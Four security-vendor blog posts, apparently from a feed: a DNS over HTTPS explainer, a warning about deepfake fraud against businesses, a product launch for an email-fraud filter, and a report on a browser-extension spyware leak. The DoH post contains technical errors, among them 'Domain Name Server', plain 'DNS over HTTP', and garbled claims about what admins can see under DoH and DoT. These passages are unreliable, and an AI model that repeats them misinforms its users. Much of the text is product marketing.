A new internet protocol is making headlines in the world of enterprise security: DNS over HTTPS. Even though this is of major interest especially for businesses and organizations, regular users will be impacted by it as well. Are you ready for this cybersecurity revolution yourself?

Here’s what all the fuss is about the new DoH protocol. If done right, the hype around it is well-deserved. Once it’s implemented well, DoH can make network communications much more secure.

The new DNS over HTTPS protocol is still relatively new in the world of network connections. First emerged about two years ago, the new protocol is mostly not implemented yet.

When it comes to browsers, Google seems to be the first to it. They recently announced they plan to roll out DNS over HTTPS in the near future.

This guide will tell you what this means and how you can implement DNS over HTTPS yourself, the changes to expect and so on.

What Is DNS over HTTPS (DoH) and How Does This Protocol Work?

First thing’s first, let’s clear up the basics. Not everyone understands exactly what DNS is and how it works, let alone the new DNS over HTTPS.

DNS definition:

DNS stands for Domain Name Server and it helps computer networks attach various information to each web domain. To put it simply, all Domain Name Servers are basically the fundamental internet address book.

But while people can remember a domain name easily, computers need numbers to understand it. That’s why the DNS system ‘translates’ each domain name into an IP number and assigns this info, together with other details.

A DNS traffic filtering solution is a crucial security layer for businesses and consumers alike. We discussed elsewhere the importance of DNS traffic filtering and what cybercriminals can hope to get from infiltrating it.

Now that we defined DNS and DNS filtering, let’s move on to the new buzzword in cybersecurity news: DNS over HTTPS (DoH).

DNS over HTTPS (DoH) definition:

The new standard released by the IETF enables DNS protocol to be enabled over HTTPS connections (the more secure form of HTTP).

DNS over HTTPS (abbreviated as DoH) is an internet security protocol which communicates domain name server information in an encrypted way over HTTPS connections.

DNS over HTTPS vs. DNS over HTTP vs. DNS over TLS

A. DNS over HTTP vs DNS over HTTPS

Most networks are now still using DNS over HTTP communications, which makes them vulnerable to man-in-the-middle attacks if they are not protected by a traffic filtering solution. This is because this communication is sent in plain text.

The innovation brought on by the DNS over HTTPS protocol is that the communication is encrypted using built-in application HTTPS standards. This helps achieve an unprecedented default level of privacy and data protection since the encryption is (or should be) the golden standard.

Man-in-the-middle attacks (a common cybersecurity concern) are more or less useless if DNS over HTTPS is enabled. Since all DNS requests are encrypted, a 3rd party observer cannot make sense of the data they would gleam.

If that data is not encrypted (such as in the DNS over HTTP protocol), it is easy for a 3rd party malicious observer to see what domains you are trying to access. In contrast, when DoH is active, this data is encrypted and hidden within the enormous amount of HTTPS data which passes through the network.

Therefore, there is no comparison to be drawn between DNS over HTTPS (DoH) and DNS over HTTP. DoH is clearly the superior protocol. It’s only a matter of time until everyone adopts it one way or another, and the road may indeed be difficult for a time.

B. DNS over HTTPS vs. DNS over TLS

I think we’ve cleared up by now what is DNS over HTTPS (DoH).

DNS over TLS (or DoT) is regarded by some as being more or less the same thing with DoH, but this is not accurate. It’s true that both types of protocols achieve the same result: encrypting your DNS communications.

But each type of DNS protocol uses a different port for this encryption they make and the focus of each. The DoH encryption allows, theoretically, network admins to view the encrypted DNS traffic should an issue arise, while the DoT encryption can protect data even from admins.

The fans of DoT protocols state that this DNS over TLS standard is a better fit for human rights concerns in problematic countries. At the same time, in countries where freedom of speech may be limited, the only effect of enabling DoT encryption may be that it draws attention. In other words, authoritarian regimes may look unfavorably upon those who adopt DoT instead of the more mainstream DoH.

Other than that, there is also the technical difference of the port used. DNS over TLS has its own dedicated TLS port, Port 853. DNS over HTTPS uses a different one, Port 443. This internet port (Port 443) is the current standard for all HTTPS communications, so it makes sense that DoH uses it too.

How Chrome and Mozilla Are Going to Implement DNS over HTTPS (DoH)

Both Google Chrome and Mozilla have announced that they plan to include DNS over HTTPS by default in future builds.

A. How Chrome will include DNS over HTTPS:

For now, the Chrome team is experimenting with the new DoH protocol only for a limited number of users. This trial period will help them fix any potential issues and figure out how to then deploy DoH for everyone.

The DNS over HTTPS protocol will be tested starting with the new Chrome 78 version of the browser, which is not launched yet. You can also opt into this experiment if you’d like to be part of the users who get DoH in advance.

You can access the Chrome flag chrome://flags/#dns-over-http in order to activate or deactivate the DNS over HTTPS experiment, once Chrome 78 is live.

The only downside to this is that DoH is still relatively hard to configure manually in Chrome, for inexperienced users at least.

B. How Mozilla will include DNS over HTTPS:

To their credit, Mozilla has been working on DNS over HTTPS implementation for a longer time than Chrome, and it shows. As of now, opting to implement DoH in your browser is easy even for non-technical users, and the protocol settings have a much more developed interface.

For now, it’s an opt-in, as mentioned above, but Mozilla has announced that they plan to make DoH a default in future browser versions as well.

How DNS Traffic Filtering Solutions Need to Adapt to HTTPS

As most organizations are already aware, a DNS traffic filtering solution is a crucial layer of their cybersecurity environment. But while most organizations are already using a DNS traffic filter, the dilemma brought on by DoH is that compatibility issues may arise once browsers start using DoH by default.

In laymen’s terms, here’s what can be problematic. DNS traffic filtering solutions are using the settings built-in Operating Systems in order to perform DNS queries. But if the browser (whether it be Chrome or Mozilla) will no longer use the standard DNS port (53) for queries and instead switch to the DoH one (443), the traffic filtering solution will lose sight of those queries.

Basically, this has an upside and a downside. On the upside, the built-in DNS over HTTPS protocol from browsers will take over some parts of the functionality held until now by DNS traffic filtering solutions. This is good news for those who did not yet adopt a DNS traffic filter, but they should still be warned that DoH is not enough for security.

On the downside, when the DNS queries from the browser are wrong (or intentionally misled by malicious 3rd parties), the DNS traffic filter might have trouble catching on.

This is why when choosing a DNS traffic filter provider, you need to make sure that they support DNS over HTTPS correctly. Our Thor Foresight Enterprise solution is currently developing a solid integration of DoH.

How to Implement DNS over HTTPS Correctly in Your Organization

Since for the first time the DNS over HTTPS protocol makes the DNS traffic communications encrypted, this can bring about more privacy and better security for users and organizations.

But because the DoH protocol is still new, some organizations are anxious about adopting it, due to compatibility and implementation issues. Here’s what you need to know in order to ensure a smooth transition to DNS over HTTPS.

Pros to Early Adoption of DNS over HTTPS (DoH):

  • You get to test out how DoH will integrate with your networks ahead of time and fix any potential issues before the DoH protocol becomes default;
  • If implemented right, you can gain more data security and better privacy across your organization;
  • You get to test out the compatibility of DNS over HTTPS with your DNS traffic filter;
  • Your feedback may help all software parties involved better their products, to your benefit.

Cons to Early Adoption of DNS over HTTPS:

  • If your system admin(s) are not experienced with DoH and similar security protocols, this can end up in blocked queries, false-positive security flags and so on;
  • If your DNS traffic filtering solution has not worked to integrate with DoH, this can render it ineffective;

How We Cover DoH within Thor Foresight Enterprise

For the moment, our Thor Foresight Enterprise product (which includes DarkLayer Guard, a market-leading DNS traffic filtering solution) circumvents the DNS over HTTPS which will be implemented by browsers.

While we still use the DNS settings from the operating system, we supplement the queries from the browser. Since the DoH protocol is still under tests in browsers, whenever DNS servers will have a fallback, their system will proceed to query the OS settings, which is where our solution comes in.

On the long(er) run, we are working to fully integrate the DoH protocol with DarkLayer Guard in a way which will help every party involved develop stronger cybersecurity and cyber resilience.

Wrapping up

Like any IT innovation, DNS over HTTPS can pose a few challenges at first, until everyone gets aligned with it. But once DoH becomes the standard, the benefits of it will greatly outweigh the difficulties it poses in the beginning.

The post Enabling DNS over HTTPS (DoH): Advantages and Best Practices appeared first on Heimdal Security Blog.

How Deepfakes Can Ruin Your Business

Worldwide concern is increasing over the adverse effects that deepfakes could have on society, and for good reason. Recently, the employee of an energy company based in the UK was tricked into thinking he was talking on the phone with his boss, the CEO of the German parent company, who asked him to transfer $243,000 to a Hungarian supplier. Of course, the employee was not speaking with the actual CEO, but with a scammer who was impersonating the real CEO through voice-altering AI.

This kind of social engineering attack is not new. In fact, merely two months ago, cybersecurity researchers identified three successful deepfake audio attacks on companies. Their “CEO” called a financial officer to ask for an urgent money transfer. The voices of the real CEO had been taken from earnings calls, YouTube videos, TED talks, and other recordings, and inserted into an AI program which enabled fraudsters to imitate the voices.

These types of incidents are the audio version of what are known as deepfake videos, which have been causing global panic for the past couple of years. As we become accustomed to the existence of deepfakes, this may affect our trust in any videos we see or audio footage we hear, including the real ones. Videos, which once used to be the ultimate form of truth that transcended edited pictures that can be easily altered, can now deceive us as well.

And this brings us to the question:

How safe is your business in the face of the deepfake threat?

What are Deepfakes?

Deepfakes are fake video and audio footage of individuals, that are meant to make them look like they have said and done things which, in fact, they haven’t. “Deep” relates to the “deep learning” technology used to produce the media and “fake” to its artificial nature. Most of the time, the faces of people are superimposed on the bodies of others, or their actual figure is altered in such a way that it appears to be saying and doing something that they never did.

The term was born in 2017 when a Reddit user posted a fake adult video showing the faces of some Hollywood celebrities. Later, the user also published the machine learning code used to create the video.

Can we detect and stop Deepfakes?

Right now, researchers and companies are investigating how they can utilize AI to distinguish and wipe out deepfakes. New advancements have started to rise that are meant to help us identify which pictures and recordings are real and which are fake.

For example, Facebook, Microsoft, the Partnership on AI coalition, and academics from several universities are launching a contest to help improve the detection of deepfakes. They aim to encourage people to produce a technology that can be used by anyone to detect when deepfake material has been created. The Deepfake Detection Challenge will feature a data set and leaderboard, alongside grants and awards, to motivate participants to design new methods of identifying and stopping fake footage meant to deceive others.

Yet, this won’t prevent the fake media from being created, shared, seen and heard by millions of people before it is removed. And without doubt, it can be extremely difficult to face the consequences and repair the damage once malicious materials get distributed.

How can you spot Deepfake videos?

Until some highly reliable technical solutions are designed, we should learn to identify the tell-tale signs of deepfakes. So, here are the flaws you should be looking for:

  • Blinking – According to research, the eye blinking in videos seems to be not that well presented in deepfake videos.
  • Head position – Watch out for blurry face borders that subtly blend into the background.
  • Artificially-looking skin – If the face looks extra smooth like it’s been edited, this may be another warning sign. Also, watch out for the skin tone that can be slightly different than the rest of the body.
  • Slow speech and different intonation – Sometimes, you will notice the one who is being impersonated talks rather slowly or there isn’t quite a match between the real person’s voice and the fake one.
  • An overall strange look and feel – In the end, you should trust your instinct. Sometimes, you can simply tell something’s not right.

At the moment, one can easily spot deepfakes. But in the future, as this technology progresses, it will gradually become more difficult.

Deepfakes could destroy everything

Here is what deepfakes could have a highly negative impact on:

#1. Politics

Deepfakes could influence elections since they can put words into politicians’ mouths and make them look like they’ve done or said certain things which, in fact, they haven’t. Deepfake producers could target popular social media channels, where the content shared can instantly become viral.

#2. Justice

Fake evidence for criminal trials could be used against people in court and this way, they could become accused of crimes they did not commit. Thus, the wrong people could go to jail. And on the other hand, people who are guilty could be set free based on false proof.

#3. Stock market

Deepfakes could be used to manipulate stock prices when altered footage of influential people making certain statements gets distributed. Imagine what would happen if a fake video of the CEOs of companies such as Apple, Amazon, or Google declaring they’ve done something illegal. For instance, back in 2008, Apple’s stock dropped 10 points based on a false rumor that Steve Jobs had suffered a major heart attack emerged.

#4. Online bullying

The deepfake technology could also be used to amplify cyberbullying, especially since it’s now becoming widely available. People can easily turn into victims when manipulated media of them is posted online. Or they can get blackmailed by cybercriminals who are threatening leak the footage if, for instance, they don’t pay a certain amount of money.

#5. Companies

Someone could be making false statements about your business to destabilize and degrade it. Malicious actors could make it look like you or someone within your organization admitting to having been involved in consumer fraud, bribery, sexual abuse, and any other wrongdoings you can think of. Obviously, these kinds of false statements can destroy your company’s reputation and make it difficult for you to prove otherwise.

What can be done?

Due to the current gaps in the law, producers of deepfakes are not incriminated. However, the Deepfakes Accountability Act (known as “Defending Each and Every Person from False Appearances by Keeping Exploitation Subject to Accountability Act – yes, you’ve correctly identified an acronym right there) aims to take measures to criminalize this type of fake media.

In short, anyone who creates deepfakes would be required to reveal that the footage is altered. And if they fail to do so, it will be considered a crime. The existence of these kinds of regulations is mandatory to protect deepfake victims and also the general public from distorted information.

How can you protect your business from Deepfakes?

Your competitors could resort to deepfake blackmail in order to try to eliminate you from the industry.

No matter how good technological deepfake detection solutions will become, they won’t prevent manipulated media from being shared and reach large numbers of people. So, the best way is to teach your employees how to identify fake footage and question everything that seems suspicions inside the organization.

#1. Train your employees

The topic of deepfakes can be looked at during your cybersecurity training. For instance, if they receive an unexpected call from the CEO who is asking them to transfer $1 million to a bank account, they could, first of all, question if the person on the other line is who they say they are. Maybe, a good countermeasure would be to have a few security questions in place that need to be asked to verify a caller’s identity.

#2. Monitor your brand’s online presence

Your brand’s presence is probably already being monitored online. So, make sure your designated people keep an eye on fake content involving your organization and if anything suspicious is brought to light, they do their best to take it down as soon as possible and mitigate the damage.

This brings us to the next point.

#3. Be transparent

If you become a victim of deepfakes, ensure that your audience is aware of the targeted attack. Trying to ignore what happened or assume that people didn’t believe what they’ve seen or heard won’t make the issue disappear. Therefore, your PR efforts should be centered around communicating that someone from your company has been impersonated and highlighting the artificial nature of the distributed footage.

Never let misinformation erode your public’s confidence!

Wrapping it all up

The dangers of deefakes are real and should not be underestimated. A single ill-intended rumor could destroy your business. So, you, both as an individual and an organization, should be prepared to stand against these threats.


The post How Deepfakes Can Ruin Your Business appeared first on Heimdal Security Blog.

Heimdal™ Security Launches MailSentry™, the Solution against Business Email Compromise (BEC)

When cybersecurity advances made hacking a more expensive illegal pursuit, would-be digital thieves switched to social engineering more and more. As long as they could get insiders to trust them, they could make off with company assets in an easier way than fighting the built-in cyber-defenses. That’s why Business Email Compromise (BEC) attacks have risen so much over the past few years.

Almost every month brings yet more news of successful BEC scams. It’s usually public institutions, like city administrations or hospitals, who get targeted by these scams the most. But businesses also make ripe targets for scammers. On average, a successful BEC scam can cost companies around $59,000 per incident, and from July 2016 to July 2019, the total losses caused by BEC scams surpassed $26 billion, according to FBI’s data.

To answer the need for extra defenses against BEC attacks, Heimdal™ Security launches MailSentry™. MailSentry™ is a cybersecurity module designed to identify and prevent email fraud. Beyond the simple protection, you can get from a spam filter, this new product will allow businesses everywhere to elude the paralysis of multiple person approvals and double-checks.

Morten Kjaersgaard, CEO Heimdal Security details:

“MailSentry™ will, at last, be able to secure the final frontier of cyberattacks: fraud which relies on human trust. Businesses can now no longer be preyed on by ruthless imposters or waste valuable time in double-checking and questioning every seemingly legitimate request. With our new MailSentry™ product, we expect to lead the market for all mail fraud technologies. From now on, you can prevent CEO fraud and business email compromise in a single blow dealt to hackers.”

How Will MailSentry™ Work?

MailSentry™ is a specialized add-on to any spam filter already in place. It will pair over 125 vectors to detect fraud attempts and properly flag them. Combining email signature scans to word scans in order to detect changed IBAN codes and so on, no suspicious detail will pass unnoticed.

The new MailSentry™ product will be available as part of a personalized Enterprise suite, or as a stand-alone module. With its complex network of vectors, the BEC protection cybersecurity product will automatically detect:

  • Business Email Compromise (BEC)
  • Email-deployed Malware
  • Phishing and Spear Phishing
  • Imposter Threats (Modified Invoices)
  • CEO Fraud and Criminal Impersonation
  • Man-in-the-email and Spoofing Attacks
  • Malicious content in historical emails


With MailSentry™ your business will also receive live monitoring 24/7 by a team specialized in BEC fraud defense. This way, you can detect malicious intent in due time and prevent any costly mistakes.

Raising employee awareness about scams and Business Email Compromise (BEC) is always a good idea, but businesses shouldn’t rely on it. MailSentry™ and its automatic scan vectors will help where human vigilance fails so that scammers won’t stand a chance.

At the same time, its intelligence will be aided by the expertise of the 24/7 specialist team on-call for analyzing suspicious emails. With MailSentry™, you can stand out from your competition by harnessing the capability of innovative technology, coupled with human ingeniousness.

You can read more about MailSentry™ and schedule a free demo HERE.

Note: MailSentry™ will be live and ready to deploy on 31st October 2019.

About Heimdal Security: Heimdal Security is an emerging cybersecurity company, founded in 2014 in Copenhagen by winners of the world ethical hacking competition Defcon CTF. Since then, the company has grown spectacularly, earning awards for both its proactive security suite (Anti-Malware Solution of the Year in 2018) and for its blog, providing intelligence to security outlets worldwide (Most Educational Security Blog in 2016).

The post Heimdal™ Security Launches MailSentry™, the Solution against Business Email Compromise (BEC) appeared first on Heimdal Security Blog.

SECURITY ALERT: Massive Data Leak Revealed the Sensitive Information of Millions of People

The web surfing history of millions of people was intercepted yesterday in a huge data leak. Large Swedish companies, such as Volvo, SAS, Ericsson, Husqvarna, and SKF have been affected, as originally reported by the Swedish newspaper Dagens Nyheter. About 40,000 people involved in the cyber incident allegedly are Swedes.

Spyware in Browser Extensions Enabled the Attack

The data spill was caused due to a spy code installed in Chrome and Firefox add-ons, which allowed the browsing history of millions of users to be harvested and sold.

A part of the leaked data comes from some of the largest organizations in Sweden. The database contained information such as discussions between employees, downloaded files, and internal confidential information. More precisely, it was possible to see exactly what people did online and although the information was considered to be anonymous, their identity could be confirmed.

The Failure of a SpaceX Rocket Engine Was Also Leaked

According to security engineer Sam Jadali, other major international companies have been involved as well. For instance, information from the space company SpaceX regarding the failure of a rocket engine was revealed. The vehicle was used to transport astronauts to and from the International Space Station (ISS).

The Company Behind the Data Leak

The information was collected and sold by Nacho Analytics, which is ending its activity now that the leak has been brought to light.

This is the pop-up message that is currently being displayed on their website:

“Nacho Analytics is closing all remaining accounts, and sending refunds to our existing customers for their recent payments. It will take a few days to work through this process. We appreciate your patience. If you are an active customer, please check your email for more detailed information.

Our limited site is active to offer customer support during this transition.”

nacho analytics data leak september 2019

Browsing habits are a method of studying customer patterns and monitoring competitors. This leak is similar to the one we’ve seen in the Cambridge Analytica scandal, which could abuse Facebook data to be used in political campaigns, writes SVT.

Why Did the Data Leak Happen?

The reason is that many companies use browser-based tools. And if an employee accesses a browser extension compromised by spyware, the activity within the tool can also be intercepted by cybercriminals.

Our CEO, Morten Kjaersgaard, has spoken with IT-Kanalen about how serious the problem is.

In his view, the issue seems to be greater than we realize. Specifically, any extension could be used by cybercriminals to access sensitive data. The reason is that these add-ons are not part of a company’s internal system, but developed by third parties. When users install a plugin in a browser, a port opens to the underlying engine – in this case, Chrome or Firefox – where it gets access to data other than it should have access to.

On a more positive note, the issue was discovered early, and this way we can get the chance to better understand it and find solutions. We should somehow be glad that the attack did not hit IE, which is more commonly used because this way the damage would probably have been significantly higher, says Morten Kjaersgaard.

How can we reduce the risks?

The simple answer would be to disable all plugins. But since this is rarely a viable solution, here are the recommendations for companies and consumers.

Advice for Companies

Companies should follow several steps. First of all, their IT department should design some form of policy-based system for deciding which add-ons should be installed and also know how they should be handled and monitored. There are existing solutions that are partially already integrated into Chrome.

Secondly, traffic should be monitored in real-time. This way, companies can detect early on whether systems connect and send data to suspicious locations. If this practice is combined with DNS protection and IP filtering, then you will have a great security foundation for your company.

Advice for Consumers

The most obvious recommendation would be not to install any extensions. But if you need to do it, always make sure you only have installed a few add-ons that you really depend on. What’s more, browser extensions should come from trusted, reputable sources and not from any unknown sites or companies.

By using DNS and IP filtering in combination with traffic monitoring and firewalls, both consumers and companies will play their part in the fight against cybercriminals. And this is something that we must all start with as soon as possible, Morten Kjaersgaard concludes.

Swedish speakers can read the full interview with Morten Kjaersgaard, Heimdal Security’s CEO, here.

Does your company need a cybersecurity solution to prevent Spyware and the most advanced types of malware?

Get in touch today to learn how we can help you.


The post SECURITY ALERT: Massive Data Leak Revealed the Sensitive Information of Millions of People appeared first on Heimdal Security Blog.